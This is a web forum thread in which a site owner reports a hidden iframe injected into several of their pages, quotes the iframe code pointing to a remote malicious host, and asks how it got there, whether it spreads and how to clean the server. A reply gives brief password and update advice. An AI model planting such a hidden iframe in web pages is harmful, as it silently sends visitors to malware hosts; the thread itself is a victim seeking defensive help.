i just removed code from in a few pages that had a hidden iframe

<iframe src="http://example.ru:8080/ts/in.cgi?pepsi119" width=125 height=125 style="visibility: hidden">
when this happens could it be an actual person who is hacking my site?


or could it be an actual person (like an enemy or someone who doesn't like me) who might cause this to happen


or is it just random code???

Hi,

If you have installed third party tool into your domain then upgrade it to the latest version and always stay upgraded..

Reset your password to the strong one and reset it on regular intervals..

If you have upgrade/downgrade or install-uninstall from third party tool into your domain then it may add this kind of the code..

thanks, yes I have changed my password.

a couple questions

1. if i remove the code from all pages on server does it mean the Trojan is gone or does it still live on the server somehow?

2. if a Trojan or bad code like what I pasted above is in 1 page can it spread to other pages by itself or is it only FTP injected once?

3. if a Trojan or bad code like what I pasted above is pasted elsewhere (like in this forum post) can it become active where it is pasted?

4. When I was testing my site, I would go to the page I knew had the bad code in it and I would see 2" of white space at the top of my page. then, of course, when I looked at the code I saw the hidden iframe. Then I hit the refresh button on that page and I could see in the status bar the browser trying to connect or possibly connecting to the example.ru website. So the question is, if my computer was not infected and I hit the refresh button would that infect my computer?


finally, some of these questions arsie because I dont know how far I have to go to "clean" everything. do I have to reinstall OS locally and wipe the server clean too?


Its a bit more complicated because I recently hired a Eastern European company to work on a new version of my site and I also suspect they might have somehow caused this (not intentionally....they have very high ratings on Elance anyway - FWIW). But they did access the server a couple times (and I always changed password after).

So how do i know its not me or if its them??? sorry about the confusion!

current is 1 and 1 hosting

the that code that is redirecting (or attempting to redirect)is In the file source

at top of the body code:

</head>
<body>
<iframe src="http://example:8080/ts/in.cgi?pepsi119" width=125 height=125 style="visibility: hidden"></iframe>
<div id="masthead">

the url http://example.rn is listed on MalwareURL.com as bad and it seemed to show in a few other Google results.



--


this is code in my web pages on my server


it has been seen elsewhere like by 1and 1 support and the developer. accessed from (mac or pc)


bootime scan reveals nothing on my system (mac or pc) and windows updates normally.


it does try to redirect , its a hidden iframe but the page loads (but the page header/graphics is shifted down by about 2 " )

then if you try to refresh the browser, you can see it attempting to load the bad/remote url (but it dosnt fully parse the page- it just keep loading in the status bar)


--


UPDATE:

turns out the dev said that they did in fact have a virus on their server which somehow was transferred to my server. they said it has been cleaned.


if anyone is following this thread it would help to get some feedback because even though I now know the source, most of my questions have not been answered. given that now Im kind of paranoid, I'd really like to know more about how these things work.

in addition to all the previous questions, how I scan my server or a database if I want to??


is it possible to scan for keywords?